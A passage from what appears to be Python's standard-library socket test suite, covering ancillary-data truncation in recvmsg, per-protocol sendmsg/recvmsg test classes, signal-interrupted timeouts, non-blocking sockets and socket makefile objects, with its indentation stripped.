self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(TimeoutError, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
